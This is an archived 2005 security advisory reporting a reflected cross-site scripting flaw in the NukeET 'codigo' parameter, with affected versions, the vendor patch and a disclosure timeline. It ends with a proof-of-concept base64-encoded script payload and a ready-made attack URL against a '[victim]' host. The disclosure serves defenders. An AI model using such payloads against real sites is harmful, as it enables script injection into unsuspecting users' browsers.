NukeETXSS.txt

2005-08-07T00:00:00
ID PACKETSTORM:39126
Type packetstorm
Reporter Lostmon
Modified 2005-08-07T00:00:00

Description

                                        
                                            `################################################  
NukeET 'codigo' variable cross site scripting  
vendor url:http://www.truzone.org  
advisore:http://lostmon.blogspot.com/2005/05/  
nukeet-codigo-variable-cross-site.html  
Vendor confirmed : yes exploit available: yes  
#################################################  
  
NukeET Contains a flaw too that allows a remote cross site scripting  
attack.This flaw exists because the application does not validate  
'codigo' variable upon submission to the 'catalog.php'scripts.This   
could allow a user to create a specially crafted URL that would  
execute arbitrary code in a user's browser within the trust  
relationship between the browser and the server,leading to a loss   
of integrity.  
  
bug found by Suko , investigate and reporter by Lostmon.  
  
##########  
versions  
##########  
  
prior to 3.2 afected  
  
##########  
solution:  
##########  
  
vendor patch  
  
http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77  
  
###########  
timeline  
###########  
  
discovered: 9 may 2005  
vendor notify: 9 may 2005  
vendor response : 10 may 2005  
vendor fix: 10 may 2005  
disclosure: 10 may 2005  
  
  
##########  
exploit:  
##########  
  
'codigo' variable acepts base64 url encode , if we encode for example  
  
<script>alert()</script><h1>XSS PoW@ !!!</h1>  
  
in base64 this is:  
  
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+  
  
if we aded this base64 code the alert and de tag h1 is executed with  
any problem.  
http://[victim]/security.php?codigo=  
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+  
  
  
################ End ##################  
  
thnx to estrella to be my ligth  
thnx to all http://www.osvdb.org Team  
thnx to all who day after day support me !!!  
thnx to Suko "la paciencia es una virtud pekeño Jedy"  
  
--  
atentamente:  
  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente....  
`